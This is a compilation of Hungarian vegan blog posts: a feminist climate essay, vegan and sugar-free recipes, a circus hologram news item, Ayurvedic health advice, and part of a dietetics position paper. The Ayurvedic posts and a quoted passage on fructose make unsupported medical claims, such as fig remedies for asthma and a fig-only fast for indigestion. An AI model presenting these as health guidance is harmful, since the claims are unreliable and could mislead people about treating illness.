juttatnak a környezetbe, csomagolásuk általában műanyag, gyártásuk energiába és károsanyag-kibocsájtásba kerül, röviden nem környezetbarát. De már olyan sikeres a folyamatos média-üzenet, hogy alig van olyan nő, aki ne próbálna folyamatosan valamit változtatni a külsején. Viszont ez a 22-es csapdája: ha sminkeled magad (vagy sok kozmetikumot használsz), megszólnak, ha nem sminkeled magad (vagy alig használsz kozmetikumokat), akkor is megszólnak. Könnyű lenne azt mondani, hogy abba kéne hagyni ezt az egészet, elég lenne egy szappan meg egy dezodor, de gyerekkorunk óta suttogja, néha üvölti a fülünkbe a média, hogyan kéne kinéznünk, miért nem vagyunk elég jók. Még fokozatosan elkezdve is nehéz lemondani a sok kozmetikumról anélkül, hogy szarul éreznéd magad a bőrödben, és anélkül, hogy jelentős önbizalmat vesztenél (amit aztán visszanyerhetsz, de ez is önmunka eredménye, még egyszer mondom: önMUNKA eredménye. És mint minden munka, ez is energiát igényel). Divat Nem mondok nagy újdonságot azzal, hogy a nőktől öltözködés terén is nagyobb az elvárás, mint a férfiaktól. Sokkal többféle ruha és cipő szükséges egy átlagos életvitelhez egy nőnek, mint egy férfinak. Egyébként az, hogy a férfiaknak sokkal kevesebbféle színű ruhát és kiegészítőt gyártanak, egyrészt természetesen igazságtalanság velük szemben, ugyanakkor így könnyebb jól kinéző ruhaösszeállításokat felvenniük a hétköznapokban, ami kevesebb ruhát igényel, így alapvetően fenntarthatóbb. Még egy példa: Ha ugyanabban az öltönyben mész az összes barátod esküvőjére, senkinek sem tűnik fel, de a nőknek valamiért illik változatosan öltözni még alkalmakra is, ráadásul esküvőre nem illik fehéret, feketét és pirosat felvenni, viszont más alkalmakra szükség lehet fekete ruhára is. És persze mindhez más színű cipő és táska illik. Apropó táska: a női nadrágok zsebei átlagosan fele akkorák, mint a férfi nadrágoké, akkor is, ha ugyanakkora maga a nadrág, és alkalmi ruhákon leggyakrabban egyáltalán nincs zseb. Mind a kozmetikai ipart, mind a divatipart kezdik meghódítani a környezetbarát termékek, ám ezek sokkal többe kerülnek, mint a hagyományos megfelelőik. Vagy az van, hogy az adott cég tényleg jobbá akarja tenni a világot, és a minőségi, környezetbarát alapanyagok és az etikus előállítás drágább. Vagy pedig – és ilyen is van – meglovagolja csupán az aktuális öko divathullámot. Hogy az adott termék melyik kategóriába tartozik – extra kutatómunkával kideríthető, és persze ez a munka is a nőkre hárul. Kapitalizmus A kapitalizmus pont úgy működik, mint egy pszichopata ember: nem érdekli az emberi élet, nem foglalkozik a valódi értékekkel, manipulálja az embereket és kijátssza a szabályokat. A kapitalizmust egy dolog érdekli: a profit. És meg is szerzi: a világ vagyonának 75%-át az emberiség 5%-a birtokolja. Tehát kb. 350 millió emberé az összes pénz (és anyagi javak) 75%-a. A maradék 7 milliárd ember osztozik a maradék 25%-on. A Föld életének 0,00000011%-ában létezik a kapitalizmus, és máris tönkretette a bolygót, állatfajok tömeges pusztulását okozza – és lehet, hogy az emberiség pusztulását is. Mik is egy törtető, karrierista ember legfőbb tulajdonságai? Nem érzelmeskedik, az üzlet mindenek felett, átgázol másokon, megszerzi, amit kitűzött magának, sosem mutatkozik gyengének, sebezhetőnek, háborúkat indít, ha megsértődik, és ha ez amúgy profitábilis. Ez nagyban egybevág az úgynevezett toxikus férfiasság* képével: hogy a férfi nem érzelmeskedik, “racionálisan” (tehát más embereket és az emberi értékeket semmibe véve) hoz döntéseket, nem mutatkozik gyengének, sebezhetőnek, nem vallja be, ha hibázott, vagy ha nincs igaza, elsődleges célja, hogy pénzt keressen. A valódi racionalitásnak amúgy semmi köze ahhoz, amiről itt szó van, mivel ezek az emberek még jobban ki vannak szolgáltatva a saját érzelmeiknek, amikkel önismeret hiányában nincsenek tisztában. *A toxikus férfiasság kifejezés nem azt jelenti, hogy minden férfi toxikus (mérgező), hanem azt, hogy a társadalom nagyon sok mérgező tulajdonsággal ruházza fel a férfiakat, akik ennek meg akarnak felelni, pl. agresszió, szenvtelenség, az érzelmek elnyomása stb. Szerencsére ez a fajta férfi “ideál” kihalófélben van. Mert sem az egészséges lelkivilággal, sem az egészséges kapcsolatokkal, sem a fenntartható jövővel nem összeegyeztethető. Ha férfi vagy, és úgy érzed, eleget teszel a párkapcsolatodban házimunka és fenntarthatóság terén, kérdezd meg a partnered, hogy egyetért-e, és beszélgessetek erről! A férfiak gyakran nem is tudnak arról a rengeteg agymunkáról, amit a nők a hétköznapokban végeznek. Muszáj a férfiaknak is nagyobb részt vállalniuk a fent felsorolt dolgokban, a hétköznapi szexizmus legyőzésében, és le kell küzdeniük a saját, választott tehetetlenségüket. Akkor talán sikerülhet együtt visszafordítani az éghajlatváltozást. De az is lehet, hogy a nők vállán van a világ megmentése. Vajon elbírjuk? Vajon tényleg mi lennénk a “gyengébbik nem”? Tedd a kedveceim közé 0 The post A klímaváltozás feminista probléma (is) appeared first on VegaNinja.
Cseresznyés eperlekvár
Őrizzük meg a nyár zamatát és illatát, mentsük el bíbor és karmazsin színeit üvegjeinkbe lekvárt főzve a finom, édes, piros bogyókból! Nincs is jobb reggeli hideg időkben annál, mint kinyitni egy üveg lekvárt és élvezni az üvegben elrejtett nyár ízeit egy szelet pirítós kenyéren vagy zab- esetleg kukoricakásán. Ráadásul ma már egyre inkább divat a hozzáadott cukor nélkül elkészített lekvár, hiszen édes lekvárt készíthetünk egy másik, édesebb gyümölcs hozzáadásával. Datolya, mazsola, füge és banán mindegyike természetesen édessé teszi lekvárunkat, így nélkülözhetjük az ipari feldolgozás útján nyert fehér cukrot. Ha egy másik - édesebb - gyümölcsöt használunk fel lekvárunkhoz édesítésre, többszörösen jól járunk, hiszen nem csupán édesítjük, de ismét rostot is adunk általa a lekvárhoz. "A fehér c ukor káros hatásai közé tarozik ugyanis, hogy alig tartalmaznak rostanyagot, így többet tudunk enni belőlük és az általuk készült ételekből is, mint a rostban gazdag táplálékokból. Ezáltal megterheljük gyomrunkat és emésztőszerveinket. A cukor sem vitaminokat, sem ásványi anyagokat nem tartalmaz, így feleslegesen égeti a szervezetet, csak üres kalóriát ad. Fontos tudni, hogy a cukor akkor sem válik egészséges táplálékká, ha azt vitaminokkal és ásványi sókkal egészítik ki - lásd a barna cukrot. A szervezetbe kerülve kiüríti a B1-vitamin raktárát is. A gyümölcsökben lévő cukrok, illetve ezek rendszeres fogyasztása nem okoz a finomított cukorhoz hasonló tüneteket. Ennek oka egyrészt az, hogy a gyümölcsökben nem a károsabb glükóz, hanem a hasznos fruktóz azaz gyümöcscukor dominál. (A fruktóz a vérkeringésben hosszantartó egyenletes vércukorszintet biztosít és nem terheli meg a hasnyálmirigyet. A gyümölcscukor másik előnye, hogy nem okoz erjedést - ellentétben a glükózzal.) Másrészt pedig még nagyobb mennyiségű gyümölcs fogyasztása esetén - a gyümölcs magas víztartalma miatt - sem fenyegeti szervezetünket az a veszély, hogy egyszerre sok cukorral kell megbirkóznia." (Tóth Gábor, élelmiszeripari mérnök)
A recept
Hozzávalók:
- kb. 3 kg eper
- kb. 2 kg cseresznye
- 30 -40 dkg datolya/mazsola/füge/banán (vagy több, ha édesszájúbbaknak készül)
- útifű-maghéj/agar-agar (opcionális)
- üvegek
- befőzési fólia
Elkészítés:
Mint minden befőzés, úgy ez is két nélkülözhetetlen alappal indul.
- A gyümölcsök alapos átmosása (többszöri vízben, az én epreim és cseresznyéim háromszor is megfürödtek jó hideg vízben), és természetesen az esetleges rossz szemek kiválogatása
- Az üvegecskék előkészítése. A következő hadművelettel érdemes ezt végezni:
Keressünk néhány elfekvőben lévő lehetőleg csinosabb üveget. Győződjünk meg arról, hogy a kupakok épek és rozsda- illetve, karcmentesek. Mossuk el őket. Ha szükséges, forró mosogatószeres vízben áztassuk le a címkéket. Miután kívül belül a kupakokat és üvegeket eltisztítottuk, fogjunk egy nagyobb tepsit. Helyezzük az üvegeket és a fedőket a tepsibe. Engedjünk vizet mindegyik üvegbe kb. félig, valamint a tepsibe is öntsünk valamennyi vizet. Sütőbe rakva addig melegítsük, míg az üvegekben a víz forrni kezd. Amikor már felforrt a víz mindegyik üvegben, kivehetjük a sütőből. Fontos, hogy ezt vízforralós tevékenységet már akkor csináljuk, amikor szinte kész a lekvárunk. Ugyanis a felforrósított, átsterilizált üvegekbe szinte azonnal tölthetjük a lekvárokat.
A lekvár elkészítése:
Miután alaposan átmostuk a kiválogatott eper és cseresznye szemeket, odatesszük főzni és közben krumplinyomóval kicsit áttörjük a gyümölcsöt, vagy botturmixot is használhatunk erre a célra. Míg az eper és cseresznye melegedik, a datolyákat vagy mazsolákat vagy fügéket előkészítjük. Az aszalt gyümölcsszemeket (datolyákat mag nélkül) kevés meleg vízben kicsit megáztatjuk, majd a datolyát vagy fügét felaprítjuk. Ízlésünknek megfelelően édesíthetjük vele a lekvárt. Nekem a több kg eperhez mindössze 30 dkg datolya elég volt. A felaprított aszalt gyümölcsöt hozzákeverjük a lekvárhoz és együtt összefőzzük. Ha banánnal dolgozunk, egyszerűen csak felaprítjuk a meghámozott banánokat és hozzáadjuk az eper-cseresznye együtteshez.
Mivel én zselésítő anyag nélkül szerettem volna készíteni, így arra az elhatározásra jutottam, hogy az eper levét leszűrtem. Ezáltal egy tömörebb anyagú lekvárt kaptam. Ha nem szűrjük le, vagy még mindig nagyon folyékony és nem akarunk órákat a főzéssel tölteni, miután felforrt a lekvár, 3-4 púpos evőkanál útifű-maghéjat keverünk hozzá. Ha agar-agar-ral szeretnénk zselésíteni, ez eseteben a z agar-agar port vízben folyamatos kavargatás mellett feloldjuk és a forró lekvárhoz keverjük. Egy literhez 2 teáskanálnyit számoljunk. Igazán ahogy hűl, úgy zselésedik a lekvár vele.
Végül a leszűrés után a felforralt üvegekből még szinte forró állapotukban kiöntjük a vizet és a helyére az elkészült eperlekvárt öntjük. (Használjunk konyhai kesztyüt és/vagy konyharuhát, hogy a kezünket le ne forrázzuk.) A megtöltött üvegek tetejére fóliát teszünk. A fedőt alaposan rácsavarjuk majd előkészített meleg helyre fejjel lefelé állítjuk.
A meleg hely jelen esetben nyári takaró és törölköző párost jelentette egy tiszta lavorban. De máskor már rekeszbe is tettem, doboz sem megvetendő. A lényeg, hogy ezt a "melegdunszt" helyet előbb kell elkészíteni. Az idő alatt, míg a lekvár a tűzön rotyog. Miután fejjel lefelé az összes üveget a száraz, meleg helyre állítottuk, lefedjük őket, hogy melegen tartsuk és így várjuk meg, míg kihűlnek az üvegek. Legalább 24-36 óra kell nekik. Szóval ellenőrizni ráér másnap. Ha már hidegek az üvegek, akkor érdemes felcímkézni őket, majd pedig hideg, sötét helyen (Pl. pince vagy kamra) tárolni.
Természetesen maradt ki még egy kevés, ami nem került üvegbe. Gyorsan el is fogyott. Lekvárfőzésnél megeshet, hogy nem tudjuk az egészet üvegbe tölteni. Tiszta edénybe rakva (akár üveg) a hűtőben egy darabig megőrzi minőségét. Bár szerintem előbb elfogy, mint megromlana.
Egy német cirkusz hologramokkal helyettesítette az állatokat
Ha kiskorunkban a cirkusz szót hallottuk, sokunknak az elefántok, tigrisek, lovak jutottak eszébe az akrobaták és bohócok mellett. De a német Roncalli Cirkusz hologramokra cserélte a hús-vér állatokat a varáslatos és erőszakmentes élményért. A Roncalli Cirkusz 1976-os alakulása óta sajnos állatos előadásokra specializálódott, de talán végre észhez tértek, és állításuk szerint a hologramos show-val felvették a harcot a szakmán belüli állatkínzással. Most is vannak elefántok, lovak, még tüzes karikák is (ez mondjuk szerintem nem mutat túl jó képet az elveikről), de egyetlen állat sem valódi. Olyan 3D holografikus, lézerprojektoros technológiát használnak, amivel a 32×5 méteres arénában, teltházas közönség esetén is mindenki 360°-ban látja az egész, vetített előadást 3 dimenzióban. A fantasztikus, színes, magas felbontású előadás első a világon, és világszerte máris nagy visszhangja van: az emberek elgondolkodtak végre rajta, hogy megéri-e a szórakozásuk a sok állat szenvedését, rabságát, és a borzasztó körülményeket és idomítási módszereket. Aktivisták már egy jó ideje hoznak nyilvánosságra leleplező videókat cirkuszokról, ahol verik, éheztetik és gusztustalan körülmények között tartják az állatokat, akik feszített tempóban, óriási közönség előtt, szoros időbeosztásban mutatják be a betanított trükköket, ezzel hatalmas bevételt hozva az intézményeknek. Egy videó a 3D-s hologramos cikruszról, angol felirattal, német nyelven: Az Egyesült Királyságban épp most döntenek egy olyan szabályozásról, amely 2020-tól megtiltaná az utazó cirkuszoknak a vadállatok használatát. (A tiltás nem vonatkozik a szelídített állatokra, sem az állandó épülettel rendelkező cirkuszokra.) Egyébként az EU-ban már 28 országból 20-ban tilos a vadállatok cirkuszi szerepeltetése. Magyarországon még nincs ilyen szabályozás, bár 2018 legnépszerűbb aláírásgyűjtése éppen ezt követelte. További infók: roncalli.de Forrás: Bored Panda Tedd a kedveceim közé 0 The post Egy német cirkusz hologramokkal helyettesítette az állatokat appeared first on VegaNinja.
Nyári egészségmegőrzés - tanácsok az ájurvéda segítségével
2019. június 3. Élj harmóniában
Beköszöntött a nyár, tartós meleg, hosszabb nappalok és megnőtt a napsütéses órák száma. Mivel az ember a természet része, ezért a természet változása mindig hatással van ránk. Ahhoz, hogy nyáron is megőrizd testi-lelki egyensúlyod, vedd figyelembe az évszak jellemzőit. Az ájurvéda szempontjából nyáron leginkább a pitta dósa dominál. A szervezeted egyensúlyának fenntartása érdekében, előre érdemes felkészülni, életmódodat úgy alakítani, hogy kompenzálni tudd a pitta dósa dominanciáját. Akik eleve pitta típusok nyáron kiemelt figyelmet érdemes fordítaniuk egészségük megőrzésére. Egyensúlyzavar A pitta egyensúlyzavar kiváltó okai között leginkább a meleg időjárás, a túlterheltség és a sok olajos, fűszeres vagy éppen erjesztett, savanyított étel szerepel. Tünetei: erős éhség és szomjúság, leégés, bőr problémák - pattanások, kiütések, gyulladt bőr - láz, égető érzés, hasmenés, égő szemek, büdös izzadság, gyulladások, hőguta, fekélybetegségek, savtúltengés, gyomorégés és a hőség kifejezetten rosszul tűrése. Magatartásbeli és mentális jellemzők: türelmetlenség, ingerlékenység, erős kritikai hajlam, zsarnoki viselkedés, harag, ellenségeskedés. Mit tehetsz, ha szeretnéd elkerülni a fenti tüneteket vagy akár már tapasztalod magadon, hogy a pitta túlsúlyba került? Az ájurvéda számos tanáccsal szolgál ehhez. Táplálkozás Fogyassz nyáron könnyű és kisebb adag ételeket, ne terheld túl az emésztésed, de étkezz rendszeresen. Kerül a húst, tojást, olajban kisült és nehéz ételeket. Fogyassz sok lédús ételt, leveseket, több zöldséget, gyümölcsöt - cukkinit, uborkát, tökféléket, dinnyét, salátákat, brokkolit, kelbimbót, petrezselymet, zellert. A gabonák közül a baszmati rizs és az árpa a legjobb. Részesítsd előnyben az édes, fanyar és keserű ízeket. Kerüld a sós, savanyú és csípő ételek, mert ezek fokozzák a tüzet a szervezetedben. Ajánlott fűszerek: koriander, görögszéna, édeskömény, kurkuma, sáfrány. Csípős fűszereket, fekete borsot, gyömbért nagyon keveset fogyassz. Az ételeket ghível vagy kókuszzsírral készítsd - a kókuszzsír hűsítő hatású. Érdemes kerülni a cigarettát, a mézet és a hagymaféléket is. Folyadékfogyasztás A megfelelő mennyiségű és minőségű, rendszeres folyadékfogyasztás különösen a nyáron lényeges. Ha keveset iszol, hatással lesz a vérnyomásodra, emésztésedre, ízületeidre és a bőröd állapotára, valamint a fizikai és szellemi teljesítőképességedre. Fáradság, kimerültség, fejfájás, szomjúság, koncentrációzavar léphetnek fel. Ne várd meg ezeket a tüneteket! A folyadékbevitelt tudatosan alakítsd, ne csak akkor igyál, amikor megszomjazol. Fogyassz naponta 2-3 liter folyadékot (nagy melegben akár 4 litert). Elsődlegesen tiszta minőségű vizet (forrásvíz, ásványvíz), gyógyteákat vagy frissen készített gyümölcsleveket igyál. Fogyassz lédús zöldségeket, gyümölcsöket, leveseket, folyékony ételeket. Ideális szomjoltó még a Lassi. Kerüld az üdítőket, dobozos gyümölcsleveket, cukrozott és/vagy koffeines italokat, alkoholt, kávét. Ne igyál hideg italokat se, mert csak erősebben fogsz izzadni. Életmód Mivel a pitta egyensúlyzavarhoz hozzájárul a túl sok tevékenység, ezért figyelj a pihenés és a tevékenységek megfelelő arányára. Kerüld a fizikai és szellemi túlterhelést (tv, hangos zene), a túlhajszoltságot. Alakíts ki rendszeres szokásokat és ne legyen túl szoros a napirended, legyen elegendő szabadidőd. Szánj időt az idegrendszered és a szervezeted pihentetésére - végezz rendszeresen relaxációt és meditálj. Napsütés, környezet Kerüld az erős napfényt, ne tartózkodj sokat a napon. A túl sok napfény csökkenti a belső energiádat és növeli a tüzet a szervezetedben. A hűvös kifejezettem jótékony hatású. Próbálj sok időt tölteni a szabad levegőn, árnyékos, hűvös helyeken. A zsúfolt, forró tengerpartok helyett, ilyenkor jobb a hegyvidéki környezet. Öltözködés Az időjárás ellen megfelelő öltözködéssel is tudsz védekezni. Hordj laza, jól szellőző, kényelmes ruházatot, ami fedi a bőrödet. A ruha természetes anyagból készüljön - pamut, len, selyem. Hölgyeknek kifejezetten érdemes gyöngyöt hordani, mert hűsítő hatású. Bőrápolás Védd a bőröd a leégéstől - elsődlegesen öltözködéssel. Az olajos masszázs is kiváló - a lehető legjobb, ha minden reggel végzel ájurvédikus önmasszázst. A nyári hőségben, pitta alkatúaknak ehhez a legjobb a kókuszolaj, mert hűsíti a testet. Testmozgás Ne terheld túl a szervezeted, kerülj minden megerőltető testmozgást. Amikor a nap erősen süt, ne sportolj - olyankor inkább pihenj. Vegyél példát a meleg éghajlaton élő, sziesztázó népekről. Ha testgyakorlást végzel, akkor a kora reggeli órákban gyakorolj, amikor hűs a levegő. Sétálj reggelente, mert a reggeli napfény gyógyító hatású és életenergiával tölt fel. Kellemes az esti, csillagfényes séta is. Ajánlott testmozgás az úszás és a kirándulás - az erdőben patakok mentén, forrásoknál, völgyekben sokkal hűvösebb van. Amennyiben jógát gyakorolsz, részesítsd előnyben a hűsítő jógapózokat (talaj menti gyakorlatok, előrehajlító pózok). Kerüld a megerőltető pózokat, az álló és a hátrahajlító gyakorlatokat és a dinamikus gyakorlást. Végezz Shitali pránájámát. Csodaszép nyári napokat kívánok :) szeretettel Kati
Sülthagymás babpástétom
Kuriózum ez a recept, mert zsíradék-mentes, glutén-mentes és cukorbetegek is fogyaszthatják. A sült hagyma, fokhagyma és a füstaroma igazán kellemes ízt kölcsönöz a babnak, krémes, lágy, könnyen kenhető pástétom keretében. A babbal készült pástétom fehérjetartalmának köszönhetően húspástétom kiváltására igen alkalmas, különösen, ha teljes kiörlésű lisztből készült kenyérrel fogyasztjuk. Bár a babnak viszonylag magas a szénhidráttartalma, bátran fogyaszthatják cukorbetegek is ezt a pástétomot, hiszen a hüvelyesek glikémiás indexe alacsony, így kis mértékben, és fokozatosan emelik meg a vér glükózszintjét, gátolják a hirtelen vércukorszint-emelkedést. Legjobb, ha saját magunk főzünk fehér babot hozzá. Mivel csak egy bögrényi bab kell hozzá, érdemes bableves, babfőzelék vagy más babos étel készítésekor annyi babot beáztatni és megfőzni, amennyi mellett még ezt is elkészíthetjük. Ha nincs időnk, lehetőségünk órákat a babfőzéssel foglalkozni, ne szomorodjunk el, fehérbab konzerv is megteszi. Kenyérre kenve zsenge újhagymával és/vagy fűszerpaprikával a tetején megszórva kiváló ízharmóniában lesz részünk.
A recept
Hozzávalók:
- 1 nagyobb fej hagyma
- 2-3 gerezd fokhagyma
- 1 bögre főtt fehér bab
- só vagy ételízesítő
- füstaroma
- sörélesztő pehely (opcionális)
Elkészítés:
A hagymafejet megpucoljuk, megmossuk, kettévágjuk és egy kisebb tűzálló edényben a két fél hagymát megsütjük. Kb. 20 perc sütés után mellé tesszük a fokhagymákat és még kb. 10-15 percet sütjük. A hagyma alja, ami az edénnyel érintkezik, enyhén karamellizálódik. Miután megsült a hagyma és fokhagyma, a sós vízben megfőtt fehér babbal, egy kevés sóval vagy ételízesítővel összeturmixoljuk. Turmixolás közben pár csepp füstaromát adunk hozzá, a legvégén pedig egy kevés sörélesztő pehellyel még krémesebb állagúra keverjük. Teljes kiörlésű liszttel is készült kenyére kenve érdemes fogyasztani.
A füge hatásai és ájurvédikus alkalmazása
2019. május 29. Élj harmóniában
Az éretlen banán hűtő hatású, növeli a vata-t, csökkenti a pitta-t és a kapha-t. Az érett banán édes és fűt, csökkenti a vata-t és növeli a pitta-t és a kapha-t. A füge az ájurvéda szempontjából édes és hűsítő, nehéz megemészteni. A vata-t és Pitta-t nyugtatja a Kapha-t emeli. Nagyon jó vasforrás és vérképző. Gyerekeknek nagyon ideális táplálék. Alacsony agnival - gyenge emésztéssel - nem szabad fügét enni. Hasmenés és vérhas esetén nem szabad fügét enni. A fügét soha ne fogyaszd tejjel együtt. Tejjel együtt fogyasztva a füge hasmenést és emésztési zavart okozhat. Néhány ájurvédikus alkalmazási mód: - Amennyiben szeretnéd erősíteni az ínyedet és a fogakat, akkor 4 fügét rágj el alaposan a nap során. - Krónikus emésztési zavar és gyomorégés esetén, egyél 7 friss fügét és 1 óráig utána ne igyál vizet. Ha 3 napig úgy böjtölsz, hogy csak ezt a 7 fügét eszed, az segít helyreállítani az emésztésed. . - Gyerekeknek, székrekedés esetén adj 3 fügét, amit meleg vízbe áztattál.. - Égő vizeletre egyél 1 órával étkezés után friss fügét. - Asztma esetén reggel, ébredés után egyél fügét egy csipet pippalival (hosszú borssal) . - Gyengeség, száraz köhögés és esti hőhullám esetén, egyél meg kora reggel 2 fügét, amit összekeversz 1 teáskanál mézzel és 1 teáskanál őrölt licorice gyökérrel. Ne egyél vagy igyál utána legalább 2 órán keresztül. - Férfiak és nők esetén, szexuális gyengeségre naponta reggeli után 3 fügét egy teáskanál mézzel érdemes fogyasztani. Rá 1 órára fogyassz egy pohár lassit. Továbbá 1 hónapon keresztül lefekvés előtt törzsölt be a hasad alsó részét meleg ricinusolajjal. Kizárólag vegyszermentes (bio) fügét fogyassz. Jó egészséget kívánok:) szeretettel: Kati felhasznált szakirodalom: dr. Vasant Lad és Usha Lad Ájurvéda szakácskönyve
Vegán kapros-túrós lepény
Kapros-túrós… Ez aztán régi, igazi falusi recept! Mennyit ettem ilyet gyerekkoromban! Igaz, városban, és húsvétkor. Na, de hogy falták a locsolók is! :-) Annak idejen Horváth Ilona beleírta ama ikonikus szakácskönyvébe, így ezután már az egész ország ismerte és sütötte. Számomra pedig az egyik legfontosabb receptről beszélünk. Szóval, idén húsvétkor merész dologra adtam a fejem. :-) Azt a bizonyos hagyományos, Horváth Ilona-féle kapros-túróst akartam veganizálni. Megmondom őszintén, nem teljesen olyan lett, mint az eredeti, de ez természetes is. Viszont nagyon ízlik, és bátran ajánlom mindenkinek, aki vegán verziót keres a régi, jól ismert, ünnepi édességek helyébe. Hozzávalók egy nagy tepsi süteményhez: A tészta: - 400 g liszt - 100g margarin - 1 csomag szárított élesztő - 250 ml növényi tej - 60 g cukor - 1 mk só A “túrós” rész: - 200 fehér rizs - 400 ml növényi tej - 120 g cukor - 2 ek aprított kapor - 1 citrom héja - félcitrom leve A “máz” rész: - 200 ml növényi joghurt - 1/2 mk kurkuma - 2 csipet édes pirospaprika (igen!) - Az élesztőt futtasd fel a cukros tejben. Közben a lisztben jól keverd el a sót és a margarint, és öntsd hozzá az élesztős tejet is. - Dagasztógéppel jól dolgozd ki a tésztát, akkor jó, ha elválik az edény falától. Takard le, és tedd félre egy órát pihenni. - Eközben készítsd el a rizst. Ehhez tedd fel főni annyi vízben, ami épp ellepi, majd amikor pár perc múlva eltűnik alóla, önts rá 400 ml növényi tejet. Sózd meg kicsit, és főzd teljesen puhára. Akkor jó, ha szétfőnek a szemek, és sűrű tejberizst kaptál. Ha kicsit kihűlt, add hozzá a citromlevet és citromhéjat, a cukrot, majd a végén keverd bele a kaprot is. - A sütemény összeállításához nyújtsd ki a tésztát kb. egy cm vastagra, így fektesd a tepsibe. Használhatsz alá sütőpapírt, de ha nem szereted, margarinozd és lisztezd ki alatta, hogy könnyű legyen majd vágni. - A rizsréteget simítsd rá, és előmelegített sütőben 190 fokon süsd negyed órát. - Ezután a közben kikevert mázat is simítsd el a tetején egyenletesen. Így tedd vissza további 10 percre sülni. Tudom, nehéz megállni, de hagyd kicsit hűlni szeletelés előtt. :-) Jó étvágyat! Elkészítési idő: kb. 50 perc Ez egy vegán recept volt. :) Hasonló recepteket ITT találsz még. Ha itt feliratkozol, a legújabbakat mindig frissen kapod majd a postaládádba. :) Nézd meg a legújabb Kertkonyha főzőtanfolyamokat! Kezdő Vegán Vegán MUST HAVE - a kötelező alapcsomag Növényi Tejek és Tejtermékek I Növényi Tejtermékek II A Mindennapi Superfood Kezdő Vegán Angol nyelven The post Vegán kapros-túrós lepény appeared first on Kertkonyha.
Bécsi túrós palacsinta (vegán)
Hallottál már 3 tonna nehézségű palacsintáról? Azt gondolod, csak mese? Hát nem. 1994-ben a manchesteri Rochdale-ben sütötték meg a világ eddigi legnagyobb és legnehezebb palacsintáját. Vastagsága 2,5 cm, átmérője pedig 15,01 méter volt és 3 tonnát nyomott. Nem vállalkoztam ennek a közelébe sem jutni, de már régóta ettem volna tepsiben sült túrós palacsintát, persze nem igazi túróval. Korábban már készítettem kölesből túrókrémet, éppen itt volt az ideje, hogy a palacsintát így készítsem el.
http://www.guinnessworldrecords.com/world-records/68403-largest-pancake
Hozzávalók a krémtúróhoz:
- 1 bögre köles
- víz
- növényi tej
- édesítő (nyírfacukor, gyümölcscukor, stb.)
- vanília
- citrom
Hozzávalók a palacsintához:
- 1 csésze teljes kiőrlésű liszt
- 1 csésze fehér liszt
- 1 csésze zabpehely liszt (vagy őrölt zabpehely)
- víz
- 1 csipet só
- víz
- 5 dl növényi joghurt
- vanília
- édesítő
Elkészítés:
A kölest alaposan átmossuk, majd kb. háromszoros mennyiségű vízben feltesszük főzni. Mikor már elfőtt a víz, öntünk hozzá annyi növényi tejet, amennyi éppen ellepi és tovább főzzük. Időközben hozzáadjuk a nyírfacukort. A citromot alaposan megmossuk, héját belereszeljük, ha úgy érezzük, hogy nem elég citromos, akkor a citromból még facsarhatunk bele. A vaníliát kikaparjuk, szintén hozzáadjuk. Addig főzzük, míg jó krémtúrós-pépes állaga nem lesz. Ha nem pépes lesz, akkor sütés alatt kiszáradhat, tehát érdemes növényi tejet úgy adni hozzá, hogy ne csak köles legyen. Ízérzéke mindenkinek más és más, ki édesebben, ki citromosabban szereti. (Kép itt található a köleses krémtúróról.)
A palacsintához a száraz hozzávalókat összekeverjük egy tálban, majd folyamatos keverés közben hozzáöntjük a vizet. A zabpehely liszt segíti a tésztát abban, amiben máskülönben a tojás. Amikor összekeverjük, elvileg palacsintaszerű tésztát kell kapjunk. Ha túl sűrű, vízzel hígíthatjuk. Ha túl folyós, keverjünk hozzá még egy kevés lisztet.
A palacsinta sütőnket - remélhetőleg teflon bevonatú vagy valamilyen más, amiben nem tapad oda - felmelegítjük. A legelső sütéshez a biztonság kedvéért tehetünk bele icipici kókuszzsírt. A továbbiakhoz én egyáltalán nem használtam semmilyen olajat vagy zsírt. De ehhez szükséges, hogy tapadásmentes bevonatú sütővel dolgozzunk.
Miután kisültek a palacsinták, megtöltjük őket, feltekerjük, félbevágjuk. Egy hőálló edényt kikenünk egy kis kókusz zsírral és a félbevágott palacsintákat állítva beletesszük. Kb. 3-5 dl növényi joghurtot kikeverünk egy kis édesítővel, hozzátehetünk egy kevés vaniliát, és ezzel a palacsinták tetejét jól megkenjük.
Sütőbe tesszük és aranybarnára sütjük. Melegen tálaljuk. Meleg vaniliasodót, vagy savanykás lekvárt is tehetünk az asztalra tálaláskor. Mindkettővel nagyon finom.
A Táplálkozási és Dietetikai Akadémia (Academy of Nutrition and Dietetics) állásfoglalása a vegetáriánus étrendekről
KIVONAT: A Táplálkozási és Dietetikai Akadémia úgy foglal állást, hogy a megfelelően összeállított vegetáriánus étrend, beleértve a vegán étrendet is, egészséges, tápanyag bevitel szempontjából megfelelő, és egészségügyileg előnyös lehet bizonyos betegségek megelőzésében és kezelésében. Ezek az étrendek megfelelőek az emberi életciklus minden szakaszában, beleértve a terhességet, a szoptatást, a kisgyermekkort, a gyermekkort, a serdülőkort, az idősebb felnőttkort és a sportoló életmódot is. A növényi alapú étrend környezetkímélőbb, mint az állati termékekben gazdag étrend, mivel kevesebb természeti erőforrást használ és sokkal kevesebb környezeti kárt okoz. A vegetáriánusok és a vegánok kevésbé vannak kitéve bizonyos egészségügyi problémák – például az iszkémiás szívbetegség, a 2-es típusú cukorbetegség, a magas vérnyomás, bizonyos típusú rákok és az elhízás - kockázatának. Kevés telített zsír fogyasztása és a zöldségek, gyümölcsök, teljes kiőrlésű gabonák, hüvelyesek, szója-termékek, diófélék és magvak (ezek mind rostban és fitokemikáliában gazdag táplálékok) nagymértékű bevitele a vegetáriánus és a vegán étrend olyan jellemzői, amelyek az összes koleszterin, illetve az LDL-koleszterin alacsonyabb szintjével és jobb szérum-glükóz-szabályozással járnak együtt. Ezek a tényezők hozzájárulnak a krónikus betegségek csökkentéséhez. A vegánoknak megbízható B12-vitamin forrásra van szükségük, ezek lehetnek például vitaminnal dúsított ételek vagy étrend-kiegészítők. J Acad Nutr Diet. 2016; 116: 1970-1980. A VEGETÁRIÁNUS ÉS VEGÁN táplálkozási szokások meglehetősen változatosak lehetnek a rendelkezésre álló élelmiszer-választék és az ilyen étrendek mögött álló motiváló tényezők különbözősége miatt. A döntés oka lehet az állatok iránti együttérzés, a vágy, hogy jobban védjék a környezetet, hogy csökkentsék a krónikus betegségek kockázatát, vagy a már kialakult betegség kezelése. A jól megtervezett, zöldségeket, gyümölcsöket, teljes kiőrlésű gabonákat, hüvelyeseket, dióféléket és magvakat tartalmazó vegetáriánus étrend megfelelő mennyiségű tápanyagot biztosít. A vegetáriánus étrend nem tartalmaz húsételeket (baromfit, vadhúst, tengeri állatokat és a 